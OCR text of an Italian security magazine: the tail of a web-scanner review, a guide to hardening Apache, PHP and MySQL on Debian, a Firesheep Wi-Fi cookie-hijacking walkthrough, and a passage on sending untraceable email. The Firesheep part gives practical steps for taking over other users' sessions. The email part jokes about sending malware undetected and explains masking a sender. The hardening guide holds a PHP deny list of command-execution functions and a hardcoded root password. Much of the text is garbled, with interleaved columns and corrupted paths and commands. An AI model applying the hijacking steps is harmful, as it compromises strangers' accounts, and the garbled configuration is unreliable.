le impostazioni scelte e, 

per procedere con la vera 
scansione, clicchiamo su Start 
Session. 

Un avviso ci ricorda che la 
versione Free Edition si limita 
all'analisi delle prime cento 
pagine del sito desiderato: più 
che sufficienti per una buona 
prova sul campo! Per finire, 
una volta arrivati alla pagina 
della scansione, clicchiamo su 
Start Scan, in alto a sinistra, 

e osserviamo l'avanzare della 
scansione. 

Dopo qualche minuto: (ma 

il tempo è variabile in base 
alla velocità della nostra 
connessione e agli esiti dei 
test), compare una finestra che 
ci dà la possibilità di salvare i 
risultati dell’analisi, che sono 
poi mostrati in tutto il loro 
splendore. 


SI 


Numero di pagine esaminate, 
vulnerabilità trovate, cookie e 
indirizzi e-mail presenti, sono 
solo alcune delle prelibatezze 
elargite da N-Stalker Free 
Edition. Il quale non limita alla 
sola analisi le sue possibilità. 
Per esempio, dalla pagina 
iniziale possiamo selezionare 
anche l’http Brute Force, un 
potente e completo strumento 
in grado di eseguire semplici, 
ma efficaci, attacchini forza 
bruta. Con la possibilità di 
caricare file di testo che 
elencano nomi utente e 
password, o specificare 
particolari espressioni di 
autenticazione. 

AI di là delle funzionalità, 
estese ed entusiasmanti, di 
un software molto diffuso 

in ambito professionale e 
finalmente disponibile in una 
versione gratuita, N-Stalker 

si fa apprezzare anche per 

le prestazioni. La velocità di 
scansione, considerate le 
‘analisi approfondite effettuate, 
è elevata e consente di farsi in 
pochi minuti una precisa idea 
sui punti deboli di un web- 
server. A quel punto, forti di 
queste informazioni, agire, “in 
un senso o nell'altro”, è molto 


“ più semplice. 
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IN QUESTO ARTICOLO SCOPRIREMO 


COME CONFIGURARE IN SICUREZZA 


UN SERVER WEB NELLA CLASSICA 
IMPLEMENTAZIONE APACHE — PHP 


MYSOL CON GNU/LINUX DEBIAN. 


ella pratica comune di 
qualunque sistemista 
capita di dover 
configurare un server 
Web per consentire la 
pubblicazione online di 
siti e file. Spesso il committente è un 
cliente con infrastruttura proprietaria 
(server ubicati presso la propria sede 
con connettività, di solito, HDSL o 
fibra) oppure è formulata la richiesta 
di configurare un server dedicato, 
fisico 0 virtuale che sia. Vi sono poi 
situazioni in cui si vuole rendere 
disponibile il servizio Web a titolo 
personale utilizzando il proprio PC di 
casa od una macchina, comunque 
domestica, preposta a quest’utilizzo. 
Indipendentemente dalle finalità ultime 
e dai motivi che portano il lettore 
all’installazione di un servizio HTTP, in 
questo articolo analizzeremo alcuni tra 
gli strumenti di eccellenza adoperati 


pil iù 


nella realizzazione di Web Server sicuri, 
scalabili e capaci di gestire più utenze 
contemporaneamente. GNU/Linux 
risulta ormai da anni la scelta preferita 
per versatilità, semplicità di utilizzo, 
prestazioni e sicurezza offerta. Se 

a questo sommiamo anche il costo 
praticamente nullo (non esistono infatti 
costi di licenza legati agli applicativi 
che scopriremo nel corso dell’articolo e 
GNU/Linux Debian stesso è un Sistema 
Operativo OpenSource gratuito e 
distribuito con licenza GPL) risulta 
immediato comprendere il perché 

di questa scelta. Iniziamo quindi col 
definire lo scenario di nostro riferimento 
cercando di renderlo quanto più 

Vicino alle richieste consuetudinarie, 

sia che provengano da clienti terzi, 

sia che riguardino la messa online di 
file personali attraverso il nostro PC. 
Come già detto il Sistema Operativo di 
nostro riferimento sarà GNU/Linux, la 


distribuzione adoperata, per praticità e 
semplicità degli strumenti amministrativi 
e di installazione offerti è Debian. La 
release consigliata per questi utilizzi è 
naturalmente quella appartenente al 
ramo stable (al momento Lenny) per 
quanto le operazioni che vedremo di 
‘seguito risultano immutate anche per 

il ramo testing ed unstable (sid). Ci 
preoccuperemo pertanto di configurare 
il server HTTP offerto dalla Apache 
Software Foundation (www.apache.org), 
il DBMS Mysql nella sua quinta versione 
ed il linguaggio di scripting PHP. 
Particolare attenzione sarà posta alle 
tematiche inerenti una configurazione 
genuina dei servizi appena citati capace 
di garantire sonno tranquilli anche a 
programmatori per il Web più sbadati. In 
quest'ottica saranno oggetto di analisi 
le patch ModSecurity e ModChroot 
disponibili per il server Apache, una 
configurazione ottimale dell'interprete 
PHP attraverso l’hardening del suo file 
di configurazione (php.ini) ed alcune 
funzioni di libreria dello stesso linguaggio 
di programmazione volte a minimizzare i 
rischi di vulnerabilità a cui son sottoposti 
gli script sviluppati. Non di minore 
importanza saranno le tematiche 
connesse alla corretta gestione del 
servizio Web in ordine di disponibilità 

e fruibilità. Vedremo quindi come, 
attraverso l’ausilio di una ulteriore patch 
per Apache (ModBandwidth), come è 
possibile bilanciare il traffico generato 
dal Server Web.Infine, la configurazione 
degli host virtuali (vhost) chiuderà 
l'articolo permettendoci di comprendere: 
come sia possibile gestire più clienti/ 
siti, anche con configurazioni totalmente 
diverse, adoperando un unico server 
fisico. Protagonista principale della 
nostra trattazione è il demone httpd 
offerto dalla Apache Foundation, le cui 


È 
SEI È 
caratteristiche possiamo apprenderle 


collegandoci con il nostro browser 
all'indirizzo httpd.apache.org. 


INSTALLAZIONE DI 
APACHE HTTPD 


La sua installazione su Debian Lenny è 
elementare essendo distribuito in forma 
binaria per tale OS e per ogni architettura 
supportata sotto il nome “apache2”. 


Prima di installarlo è buona prassi 
‘aggiornare il sistema all'ultima versione 
disponibile, comprensiva degli 
aggiornamenti di sicurezza rilasciati dal 
Debian security team. 


Digitiamo da shell di root i comandi: 


il # apt-get update 
# apt-get upgrade 


Il primo si occuperà di prelevare dai 
repository Debian gli indici relativi alle 
ultime versioni dei packages disponibili. Il 
secondo procederà con l'aggiornamento 
degli applicativi e dei servizi dell'intero 
sistema alle ultime release disponibili 

ed indicizzate precedentemente con il 
comando “update”. 


Concluso il processo di aggioramento, 
che impiegherà un tempo variabile in 
funzione della velocità della nostra linea 
e delle caratteristiche hardware del PC di 
riferimento, procediamo all’installazione 
di Apache 2, confermando la nostra 
intenzione di prelevare il pacchetto 
stesso e le dipendenze associate 
digitando “S” non appena richiesto dal 
packages manager: 


# apt-get install apache2 
Continuare [S/n]? S 


L'installazione si concluderà nel giro 

di qualche minuto ed al termine, 
collegandoci all'indirizzo “localhost” 
potremo visualizzare la tipica pagina “It 
works!” a dimostrazione dell'effettivo 
funzionamento del Server Web. 


Testato il funzionamento del demone 
+ httpd stoppiamolo. Procederemo con la 
sua configurazione di base ipotizzando 
l'utilizzo dello stesso per un solo sito 


ospitato sulla macchina in uso tra poco. 


#7/etc/init.d/apache2 stop 
Stopping web server: apache2 ... waiting 


INSTALLAZIONE 
DI MYSGL E PHP 5 


MySQL è un database relazione 
largamente adoperato nella scrittura di 
siti e Web Application soprattutto insieme 
‘al suo ormai consolidato braccio destro 
linguaggio di programmazione PHP. 

La sintassi adoperata è la SQL, attraverso 
cui è possibile gestire dati memorizzati 
sottoforma di dabase regolati dal modello 
relazionale. 


Come per Apache, l'installazione su 
Debian Lenny è un gioco da ragazzi. Da 
‘shell, con privilegi di root, invocheremo 
nuovamente apt-get come di seguito: 


# apt-get install mysql-server 


Al termine della procedura di installazione 
imposteremo una password per MySQL 
relativa alll’utente root digitando da shell: 


# mysqladmin -u root password 
‘PASSWORD' 


Sostituendo, naturalmente, 
‘PASSWORD' con la nostra password e 
mantenendo le virgolette. 

PHP, giunto alla release 5 e prossimo alla 
‘sesta (per quanto in questa direzione il 
progetto sembra aver trovato una battuta 
di arresto) è tra i principali linguaggi 
‘adoperati per lo sviluppo di siti e Web 
Application. La sua forza sta nella sua 
semplicità e nel fatto di poter contare su 
una comunità di sviluppatori pressoché 
infinita. Installiamolo pertanto insieme al 
worker per MySQL ed alla security patch 
“Suhosin” del progetto Hardened PHP: 


# apt-get install php5 php5-mysqi phpS- 
“suhosin 


Concluso il processo di installazione 
‘andremo ad editare alcune direttive del 
file di configurazione dell’interprete al 

fine di limitame le capacità ed, in questo 
modo, garantire maggiore sicurezza. 

Il file di nostro interesse è “/etc/php5/ 
‘apache2/php.ini”. Per ogni riga da editare 
offriremo una breve spiegazione di quel 


che andiamo a fare. 

In primo luogo disattiviamo la direttiva 
Safe Mode (deprecata a partire dalla 
release 5.3 di PHP) Essa si occupava 
di limitare la libertà del singolo utente 
in contesti server-shared, ovvero 
impedire che gli script di X user 
potessero interferire con quelli di Y 
user dal momento che entrambi sono 
letti dal webserver dallo:stesso utente 
relativo al demone Apache (www-data) 

e con gli stessi privilegi (di solito di sola 
esecuzione +x). La patch Suhosin mette 
un punto a questo come a tanti altri cavilli 
‘che spesso affliggono Web Server in 
produzione in presenza di sorgenti PHP 
fallati. 


IM 
Hamlet 


safe_mode = Off 
safe_mode_gid = Off 


Restringiamo il raggio d'azione delle 
direttive di inclusione utilizzabili negli 
script alla sola directory radice del 
server web (ulteriori constatazioni le 
effettueremo nel prosieguo dell'articolo 
inerenti la configurazione della patch 
ModChroot per Apache): 


open basedìr = /var/\mww, 


Disabilitiamo alcune funzioni del 
linguaggio che consentono di eseguire 
comandi sul server dal momento 

che, nel 90% dei casi, non servono 

e rappresentano esclusivamente una 
possibile criticità: 


disable_functions = exec, passthru, 
shell_exec, system, proc_open, popen, 
curl_exec, curl_multi_exec, parse_ini_file, 
show source, php_uname, getmyuid, 
getmypid, leak, listen, diskfreespace 


Disattiviamo la segnalazione degli errori 
in modo da limitare l'eventuale fuga di 
informazioni in caso di errori imprevisti 
nel codice e tentativi di attacco di tipo 
SQL Injection: 


display_errors = Off 


Assicuriamoci che la direttiva Register 
Globals sia disattivata. Questo 

modo di sviluppare appartiene ormai 
all'archeologia, occupandosi di utilizzare 
variabili HTTP senza specificare la 
provenienza delle stesse. Nel caso ad 
esempio della variabile “pippo” ricevuta 
via GET era possibile richiamare la 


stesse come $pippo piuttosto che 
$_GETT'pippo']. La conseguenza di ciò 
è facilmente intuibile potendosi riferire, 
da parte di un attaccante, ad una 
variabile adoperata nel nostro sorgente 
richiamandola semplicemente via URL: 


register_globals = Off 


Per quanto non sia una risposta 
definitiva agli attacchi di tipo “remote 
file inclusion” (in quanto l'unica concreta 
protezione contro questa tipologia di 
attacchi è data dalla patch Suhosin) è 
comunque raccomandabile disabilitare 
l'inclusione da URL e l'apertura di file da 
remoto negli script: 


allow_url_fopen = Off 
allow_url_include = Off 


Qualora non vi sia l'esigenza di 
consentire l'upload di file via PHP 
disabilitiamo questa funzionalità (file. 
uploads = Off), viceversa indichiamo 

un percorso dove conservare i file 
temporanei (entro il quale magari 
attiveremo un controllo Antivirus 
costante) e la dimensione massima degli 
stessi (un valore accettabile, ai tempi del 
Web 2.0, può essere 8 Mb): 


upload_tmp_dir = /tmp/php_uploads 
upload_max_filezize = 8M 


Indichiamo un percorso non standard 
entro il quale salvare le sessioni 
eventualmente generate dagli script 
in modo tale che sia difficile riferirsi 
alle stesse da parte di un utente con 
accesso shell: 


session.save_path = /tmp/php_sessions 


Qualora non strettamente necessario 
impediamo ad eventuali Javascript di 
poter utilizzare le sessioni generate al 
fine di prevenire fastidiosi attacchi di tipo 
XSS: 


session.cookie_httponly = 1 


ModChroot è un'interessante patch per 
Apache che ci permette di restringere 
l’environment entro cui il server opera ad 
una determinata directory. A differenza 
di una classica operazione di chroot di 
Apache, la mod si occupa di avviare 
Apache in Jail senza dover ricostrurire 
l'intero albero di file e librerie necessare 


per far funzionare il servizio. La chiamata 
di sistema chroot() viene eseguita 
quando le librerie ed i file di log sono 
‘stati rispettivamente caricati ed aperti. In 
prima istanza ci occuperemo pertanto 
di ricreare dei percorsi funzionanti per il 
server Web nella directory “/var/www”: 


# mkdir -p /var/www/var/www 

# mkdir -p /var/www/tmp/php_uploads 
# mkdir -p /var/www/tmp/php_sessions 
# chown -R www-data:www-data /var/ 
www/tmp/ 

# mkdir -p Avar/www/var/run/mysqld 

# chown -R mysql:mysql /var/Awww/var/ 
run/mysqld/ 

# mkdir /var/\www/etc 

# cp /etc/resolv.conf /var/\www/etc/ 


Modifichiamo ora il file di configurazione 
di MySQL indicando il nuovo percorso 
per la creazione del socket e del pid: 


# vi /etc/mysql/my.enf 

[client] 

3306 

= Nar/\www/var/run/mysqld/ 
mysald.sock 


[mysqld_safe] 

socket = /var/www/var/run/mysald/ 
mysqld.sock 

nice =0 

{mysald] 
user 
pid-file 
mysald.pid 
socket = /var/\www/var/run/mysald/ 
mysqld.sock 


= mysal 
= Ivar/hwww/var/run/mysald/ 


PI /etc/mysql/debian.cnf 


Socket = Nar/\www/var/run/mysald/ 
mysald.sock 


Socket = var/lwww/var/run/mysald/ 
mysqld.sock 


Stoppiamo e riavviamo quindi il servizio 
MySQL controllando che il socket ed 

il pid file siano stati salvati nel nuovo 
percorso: 


# /etc/init.d/mysal stop 

# /etc/init.d/mysql start 

# ls -na /(var/www/var/run/mysqld/ 
totale 12 

dinvxr-xrX 2 107 1164096 15 lug 17.34. 
dinvxr-xr-X3. 0 04096 15 lug 17.20 .. 


+w-1w--- 1 107 116 515ug 17.34 
mysqld.pid 

stwxrwxrwx 1 107 116 0151ug 17.34 
mysqld.sock 


Provvediamo ora a modificare 
opportunamente la configurazione di 
Apache per segnalare i cambiamenti 
avvenuti. Editiamo il file “/etc/apache2/ 
‘apache2.conf” modificando il file relativo 
al percorso dell'ID del processo (PID) ed 
abilitando ModChroot: 


# vi /etc/apache2/apache2.conf 
PidFile /var/run/apache2.pid 
ChrootDir /var/www 

Infine, installiamo la mod digitando da 
shell: 


# apt-get install libapache2-mod-chroot 


CONFIGURAZIONE 
VIRTUAL HOST 


JI 


La directory entro cui apportare le 
configurazioni di Apache su GNU/ 

Linux Debian come abbiamo potuto 
notare finora è ubicata al percorso “/ 
etc/apache2”, osserviamo i file e le 
sottocartelle contenute snodando alcune 
considerazioni da tenere a mente: 


# Is -na /etc/apache2/ 

apache2.conf 

conf.d 

envvars 

httpd.conf 

magic 

mods-available 

mods-enabled SUINI 
ports.conf di 
sites-available » 
sites-enabled n 


Le cartelle “conf.d”, “mod-available/ 
enabled” e “sites-available/enabled” 
funzioneranno come directory di 
inclusione riferite al file di configurazione 
“apache2.conf" e rispettivamente NTMNILI. 
conterranno al loro interno le 
impostazioni del server, gli addon 
(mod) disponibili ed attivi con i propri 
file di configurazione e gli indirizzi per i 
quali vogliamo rimanere in ascolto ed 
attivare il Web Server (vhost). Di questi 


peri 


2-4 

TI 
Lie gi 
if 0 È 


ultimi parleremo tra poco dal momento 
che, per ora, abbiamo ipotizzato una 
configurazione per singolo hostname 
(quello relativo alla macchina in Uso 
rintracciabile nel file “/etc/hostname” o 
comunque all'indirizzo IP del PC). 
Importante precisare che gran parte 
delle modifiche e delle configurazioni 
da apportare ad Apache 2 sono 
gestite attraverso il blocco istruzione 
<VirtualHost>. Questa è una modifica 
strutturale ed un corretto modo di 
lavorare adoperato in modo standard 
a partire dalla release 2. File di 
configurazione gestiti in questo modo 
e l'utilizzo saggio delle directory di 
inclusione entro cui collocare gli stessi 
in base ai singoli hostname da gestire, 
consentono una gestione modulare del 
servizio HTTP senza generare enormi 
file di configurazione, spesso difficili da 
manipolare. Resta inteso che quanto 
espresso di seguito è comunque 
realizzabile alla “vecchia maniera”, 
ovvero specificando tutto all’interno di un 
unico file di configurazione (“apache2. 
conf” o “httpd.conf" ). 

Diamo un occhio ad alcune direttive 
presenti nel file “sites-enabled/000- 
default” che in buona parte accetteremo 
per come presenti nell’installazione 

di default occupandoci di modificare 
solo l'indispensabile. Questo file indica 
al webserver il comportamento da 
manifestare quando arriva una richiesta 
non trattata da alcuna configurazione per 
singolo host virtuale (vhost). In sostanza, 
l'output da visualizzare e le impostazioni 
da adoperare quando si arriva al server 
Web se l'indirizzo passato non è oggetto 
di alcuna configurazione specifica. 
Azzeriamo lo stesso digitando da shell: 


"it 


# echo “” > /etc/apache2/sites- 
enabled/000-default 


Occupiamoci ora di editare il file 
riferendoci ad una configurazione che 
tenga conto delle seguenti condizioni. 
La directory radice contenente i file Web 
da rendere disponibili online vogliamo 
che sia quella ubicata al percorso “/var/ 
www” (che, adoperando ModChroot 
corrisponde al percorso “/varAwww/ 
var/www” sul nostro disco). Vogliamo 
consentire al Server di percorrere i link 

a file. Vogliamo stabilire come prioritari 
alla visualizzazione le pagine, nell'ordine: 
index.php, index.html, index.htm, home. 
php, home.html, home.htm, default. 


Ev ip A | 


php, default.html, default.htm. Vogliamo 
impedire il Listing di una directory qualora 
non vi sia nessuna delle pagine appena 
citate all'intero della stessa. Vogliamo 
abilitare un logging abbastanza severo 
‘che tenga conto anche dei messaggi di 
‘avviso e non solo degli errori. 

In base alle constatazioni fatte, il nostro 
file di configurazione (/etc/apache2/sites- 
enabled/000-default) sarà: 


<VirtualHost *:80> 
DocumentRoot /varAwww 
DirectoryIndex index.php index.html 
index.htm home.php home.html home. 
htm default.php default.html defautt.htm, 
<Directory /var/www/> 
Options FollowSymLinks 

AllowOverride None 

Order allow,deny 

allow from all 
</Directory> 
LogLevel warm 
ErrorLog /var/log/apache2/error.log 
CustomLog /var/log/apache2/access.log 
‘combined 
<NirtualHost> 


LOAD BALANCING 


Garantire la possibilità di visualizzare 

il proprio sito in tempi decenti senza 
ricorrere alla pessima pratica del “best 
effort” dovrebbe essere tra le prime 
operazioni da eseguire quando si 
configura un server Web. Le metodologie 
per farlo sono tante, ognuna con i suoi 
pro ed i suoi contro. Quella che ci sembra 
più semplice ed al tempo stesso efficace 
è l'utilizzo di ModBandwidth.Installiamola 
come finora fatto per ogni applicativo, 
ovvero adoperando il packages manager 
del sistema ed abilitiamola: 


# apt-get install libapache2-mod-bw 
# a2enmod bw 

Enabling module bw. 

Run ‘/etc/init.d/apache2 restart’ to 
activate new configuration! 


ModBandwidth può essere adoperata 

in modo da intervenire a livello globale 
(su tutti i siti eventualmente ospitati dal 
server) oppure, caratteristica ancora più 
interessante, direttamente a livello Vhost, 
limitando singolarmente un determinato 
sito a valori di banda predefiniti. Per 
quanto attiene alla configurazione 


intrapresa nel corso di questo articolo 
vedremo come attivarla a livello globale 
‘dal momento che stiamo configurando 
il server per lavorare su un solo dominio. 
Considereremo inoltre una capacità 
massima di Upload della linea pari a 
2Mbps. Editiamo nuovamente il file 
“/etc/apache2/sites-enabled/000- 
default” inserendo all’interno del blocco 
<VirtualHost> le seguenti direttive, che 
commenteremo subito: 


BandWidthModule On 
ForceBandWidthModule'On 
BandWidth all 262144 
MinBandWidth all 4096 
LargeFileLimit * 102402048 


Alla riga 1 abbiamo attivato il modulo, alla 
‘seconda imponiamo che ogni richiesta 

venga analizzata dal load balancer. Alla 

terza abbiamo quindi impostato una TU 
banda massima utilizzabile pari a 2mbps i i 
garantendo, alla riga 4, un minimo di {UNI 
32kbps per utente. All'ultima abbiamo 

limitato il download dei file superiori a 

10Mb a 16kbps, privilegiando in questo 

modo la normale navigazione web. 

Disabilitiamo la stampa del banner e 

dell’header HTTP da parte di Apache 

editando il file “/ete/apache2/conf.d/ 

security”: 


#vi /etc/apache2/conf.d/security 


ServerTokens Prod 
ServerSignature Off 


Carichiamo quindi una pagina di prova 
per controllare il buon esito delle nostre 
operazioni ed avviamo Apache: 


# cd /var/www/var/www/ 

# vi index.php 

<?php 

$db_host = “localhost”; 

$db_user = “root”; 

$db_password = “pippobaudo”; 

iflmysal_connect($db_host, $db_user, 

$db_password)) { 
echo “<h1>Installazione di Apache + | 

PHP + MySQL avvenuta correttamente</ + 

hi>"; 

} 

D» 

# /etc/init.d/apache2 start 

Starting web server: apache2 


Daelici 
Ora non ci resta che collegarci dal nostro |, 
browser a “localhost”. 


ella recente edizione 
del ToorCon, una 
convention di e per 
hacker dedicata alla 


sicurezza informatica 

svoltasi a San Diego, 
c’è stato un interessante intervento 
di Eric Butler. Eric ha infatti 
dimostrato concretamente come 
grazie a un hijacking via Wi-Fi un 
attaccante sia in grado di prendere il 
controllo della sessione di un utente 
dopo che questi abbia effettuato 
il login o si sia autenticato su un 
server, fino ad arrivare a conoscere 
la sua password. Eric in particolare 
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si è concentrato sulle sessioni 
generate dai principali siti “social” 
del momento tra cui Facebook e 
Twitter, risultati tutti vulnerabili 
all'attacco. Non a caso quindi il 
talk aveva il provocatorio titolo 
“Hey Web 2.0: Start protecting user 
privacy instead of pretending to" 
(Hey Web 2.0: inizia a proteggere 
davvero la privacy dell'utente invece 
di far finta). 

Vediamo come è possibile che ciò 
accada. 

Il cuore del problema è costituito, 
come spesso accade, dalla 
concomitanza di diversi aspetti 


ne ccm 


‘IWAGKING, 
FIRESHEEP 
ATTACCO E 
CONTROMISURE 
DEL PLUGIN 

IN GRADO 

DI BUCARE 
L’HTTPS. 


che impattano sulla sicurezza. Il 
primo di questi fattori è costituito 
da una rete wireless non protetta, 
attraverso cui la vittima decide di 
collegarsi a internet e da lì (secondo 
fattore) decide di accedere a uno 
dei social network vulnerabili. Essi 
infatti non applicano una protezione 
sulle comunicazioni successive 
all’autenticazione, prestando il 
fianco quindi a possibili attacchi. 
Per rendersi conto di cosa stiamo 
parlando non è necessario essere 
particolarmente abili, perché 

grazie a un plugin per Firefox 
chiamato Firesheep (open-source 


pt 


iii 


e disponibile per Windows, Linux e 
MacOSX) abbiamo sostanzialmente 
armato già il nostro browser a 
intercettare dati che non dovrebbero 
esserci resi disponibili, ma che al 
contrario sono trasmessi in chiaro. 
Firesheep agisce in pratica da 
sniffer, dato che è in grado di 
intercettare i cookie dell'utente 
vittima che si trovi nello stesso 
network wireless cui è collegato 
l’attaccante, rendendo disponibili 
tutte le connessioni Http e Https 
associate. Il vero problema infatti 

è che la falla persiste anche con le 
connessioni Https, perché solo il 
login è cifrato mentre il resto della 
comunicazione resta non criptata. 


Per fare un test abbiamo bisogno 
di poche cose: una rete Wi-Fi nella 
quale fare i test. 

Winpeap (winpcap.org) 

Firesheep (Http://github.com/ 
downloads/codebutler/firesheep/ 
firesheep-0.1-1.xpi) e ovviamente 
Firefox. 

Prima di tutto installiamo Winpcap. 
Poi installiamo Firesheep e dopo 
aver riavviato Firefox possiamo 
avviarlo dal menu View -> Sidebar 
-> Firesheep (tasti scorciatoia 
SHIFT+CTRL+S). 

Clicchiamo nella parte bassa sul 
pulsante delle preferenze e nel 
primo foglio del menu che ci si apre, 
impostiamo la scheda di rete Wi-Fi 
da utilizzare in modalità promiscua. 


Il pulsante in basso permette di 
selezionare la scheda di rete Wi-Fi da 
utilizzare per lo sniffing. 


Colleghiamoci alla rete Wi-Fi e 
poi clicchiamo sul pulsante “Start 
capturing” aspettando che i dati 
comincino ad arrivare. 


Selezionata ia scheda Wi-Fi e connessi 
alta rete di test siamo pronti per partire 
con l'intercettazione del cookie. 


Dopo un po’ avremo i dati di sessioni 
pre-autenticate: cliecandoci sopra 
saranno aperte direttamente nel nostro 
browser. Immaginiamo quindi cosa 
può succedere in un aeroporto 0 
internet caffè.. 


CONTROMISURE 


Il protocollo Https non può essere 

la soluzione del problema e nei 

casi menzionati ci si deve rivolgere 
necessariamente a servizi VPN quando 
si accede a dati sensibili tramite rete 
di accesso pubblico Wi-Fi. Cercando 
su google si possono trovare diversi 
servizi gratuiti e anche a pagamento. 
Se vogliamo risolvere in economia, è 
possibile installare un proprio server 
SSH, anche su Windows tramite 
Cygwin e utilizzare un client SSH 
come Putty per accedervi, mentre il 
browser può essere configurato per 
utilizzare la connessione socket del 
proxy e da lì accedere al sito web 
desiderato. 


Ecco un esempio di come si presenta 

il pannello di Firesheep dopo che ha 
intercettato diversi cookie, fra cui 
Google, Facebook, Twitter e Flickr e si è 
aperto il link verso Facebook. 


Parlando poi dell’accesso Wi-Fi, è 
chiaro che vanno prese delle minime 
precauzioni anche da chi ne gestisce 
l'accesso: se anche si stabilisce che 

il servizio deve poter essere libero 

per tutti i fruitori, è bene comunque 
‘aggiungere una password di 
connessione per gli utenti autorizzati. 
L'ideale sarebbe poi che fosse 
utilizzata una protezione più forte, 
come WPA2. 

Lato client, per gli utenti di Firefox è 
già disponibile un plugin che sembra 
possa rappresentare una possibile 
risposta al pericolo di essere “dirottati” 
da attaccanti dotati di Firesheep: si 
chiama Force-TLS (Http://forcetls. 
sidstamm.com) e forza il client ad 
accettare solo connessioni sicure 
verso i server cui ci stiamo collegando. 
E' disponibile anche una modalità 
debug che ci permette di visualizzare 
tutte le comunicazioni che intercorrono 
durante l'autenticazione e le 
successive transazioni. Per abilitarla è 
sufficiente seguire questi step: 
apriamo about:config impostiamo la 
preferenza extensions.forcetls@sid. 
stamm.debug al valore “true” 


RIAVVIAMO 
FIREFOX 


Ho scritto “sembra” dato che 

alcuni utilizzatori hanno rilevato 
comunque dei problemi. Un'altra 
possibile soluzione potrebbe essere 
rappresentata da HTTPS Everywhere 
(https://Awww.eff.org/https-everywhere) 
che però è tuttora in beta e non offre 
‘ancora garanzie certe nei confronti di 
Firesheep. 

Nell'attesa che sia quindi ufficializzata 
una adeguata contromisura 
all’hijacking possibile con Firesheep 

è bene evitare di connettersi a social 
network da posti di accesso pubblico 
Wi-Fi. In generale la rete cui ci 
connettiamo va comunque considerata 
insicura e dopo Firesheep sono 
comparsi altri tool realizzati al solo 
scopo di ricordarcelo, come Idiocy 
(https://github.com/Jonty/Idiocy/blob/ 
master/idiocy.py) che in neanche 130 
linee in Python realizza il dirottamento 
di un account Twitter scrivendo un twit 
al posto nostro. 


NALI 
HABKING/MEDIO 
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E-DRALL ASSONIGIE: 
NO, FORSE, QUASI 


SI FA PRESTO A PARLARE DI MESSAGGI ANONIMI. 
LE COSE NON STANNO COSÌ, MA CON UN PICCOLO 
SFORZO L’INVISIBILITÀ DIGITALE E POSSIBILE. 


ono in molti a riempirsi Diciamocelo: a meno che non si tratti di valide ragioni per farlo, può sfruttare 
la bocca di belle parole faccende top-secret come nemmeno la Legge.per andare direttamente al i 
sull'anonimato della ne abbiamo viste con Wikileaks, sodo, cioè da chi gestisce il server di ti 
posta elettronica. Beata difficilmente qualcuno si prenderà la posta, e chiedergli di sputare il rospo. 
incoscienza. Uno pensa briga di inseguirci da un punto all’altro Risalendo all'indirizzo IP del mittente 
che basti creare un del mappamondo digitale. e, quindi, a noi. Ahia. Molti servizi di 
‘account fasullo su Gmail per poter Anche se siamo ricercati. anonimizzazione di email tentano di 
imbrattare i forum 0, peggio (o meglio, Prima, però, vediamo cosa succede sopperire al problema rendendo il 
‘dipende dai punti di vista), inviare quando inviamo una normalissima ‘server difficile da individuare. A volte 
Hill] allegati contenenti malware, senza e-mail. Semplificando il discorso ai sfruttano dei proxy, rimbalzando il 
essere beccato. Qualcun altro, un minimi termini umani, il messaggio messaggio tra più server sparsi per 
pelo più furbo, ricorre ai servizi di invio è trasmesso e preso in carico da il globo. In altre, puntano a un unico. 
“anonimo”, dove quelle simpatiche un server di posta, che si occupa server, ma locato in paesi non molto 
virgolette indicano che si tratta di un dell’invio al destinatario. In questo collaborativi con le legislazioni del resto 
anonimato un po’ farlocco. L'anonimato processo, il server conosce del mondo. Di solito si tratta di qualche 
assoluto; quando si invia una e-mail, perfettamente il nostro indirizzo IP, lontano paese esotico, quindi la scusa 
è difficile da ottenere, ma scendendo spesso trasmettendolo così com'è 0, di andare a vedere se il server della 
‘a qualche compromesso possiamo in altri casi, mascherandolo. Resta il posta funziona è sempre buona 


rendere molto difficile risalire al mittente. fatto che se un destinatario ha delle per fare una vacanza al caldo. :-) 


DAL FACILE 
AL DIFFICILE 


Scherzi a parte, dunque, viene 
spontaneo pensare che un servizio 
di anonimizzazione della posta offra 
un buon livello di anonimato. È così? 
La risposta è “dipende dal servizio” 
in virtù di quanto detto. Uno dei più 
diffusi e semplici del momento è 
Akapost (www.akapost.com). 

Si tratta di un servizio di forward 
che, di fatto, cambia l'indirizzo del 
mittente con uno ad hoc (scelto 
dall’utente), in modo che sia questo a 
comparire al destinatario. Funziona, è 
gratuito ma le condizioni contrattuali 
negano utilizzi “nocivi”. Il fatto che il 
gestore sia californiano, comunque, 
è già un primo, discreto, deterrente 
ad azioni legali di stampo europeo. 

A un servizio come Akapost se ne 
‘affiancano altri di simili, per i quali 

è meglio dare un'occhiata alle 
condizioni contrattuali e, soprattutto, 
alla locazione. Un deciso passo in 
‘avanti lo si fa sfruttando dei servizi 
di VPN. E in questo caso ce ne sono 
pochi capaci di battere l'efficienza di 
Hotspot Shield (www.hotspostshield. 
com). Questo software gratuito 

è in grado di creare una Virtual 
Private Network pronta a rendere 
imperscrutabili le transazioni web 
‘dei nostri dati. E qui viene il bello: 
Hotspot Shield diventa una comoda 
base sulla quale poggiare tutte le 
nostre scorribande tramite posta 
elettronica. Il trucco, in realtà, è 
semplice: il problema delle caselle 


di posta elettronica farlocche, create 
ad hoc per rimanere anonimi, è che 
ci identificano tramite un indirizzo IP. 
Sfruttando un software come Hotspot 
Shield, invece, il nostro Internet 


Protocol è mascherato tramite HTTPS, 


dando filo da torcere a chi vuole 
arrivare alla nostra identità. Va da sé 
che basta installare Hotspost Shield 

e quindi creare una casella di posta 
elettronica web, per gestire in modo 
sufficientemente anonimo le nostre 
e-mall. Posto che, ovviamente, anche 
queste devono essere scritte e gestite 
con la VPN bella che attivata. 


VPN E SMTP 
SERVER, 
CHE COPPIA! 


L'utilizzo di Hotspost Shield, per altro, 
apre le porte ad altri utilizzi. Uno dei 
più ricorrenti, quando si vogliono 
inviare email anonimi, è di crearsi 

un proprio SMTP Server. Infatti, 

se questo server è il primo snodo 
identificabile per un destinatario 
deciso a rintracciarci, mascherandolo 
tramite una VPN la nostra identità 
rimane protetta in modo efficace. In 
questo caso, dopo aver installato e 
attivato Hotspot Shield, passiamo 
alla creazione di un SMTP Server nel 
nostro computer. Non è difficile: QK 
SMTP Server è uno dei programmi 
migliori nel genere e ripaga 
‘ampiamente i 25,52 euro necessari 
per l'acquisto (e comunque è 
disponibile una versione dimostrativa 
gratuita, valida per 30 giorni). 


Con una VPN e QK SMTP Server 
possiamo creare gli indirizzi e-mail 
desiderati e spedire tutti i messaggi 
che vogliamo, con un buon 
‘compromesso tra semplicità d'utilizzo 
e livello raggiunto dall'anonimato. 


E PER LA POSTA 
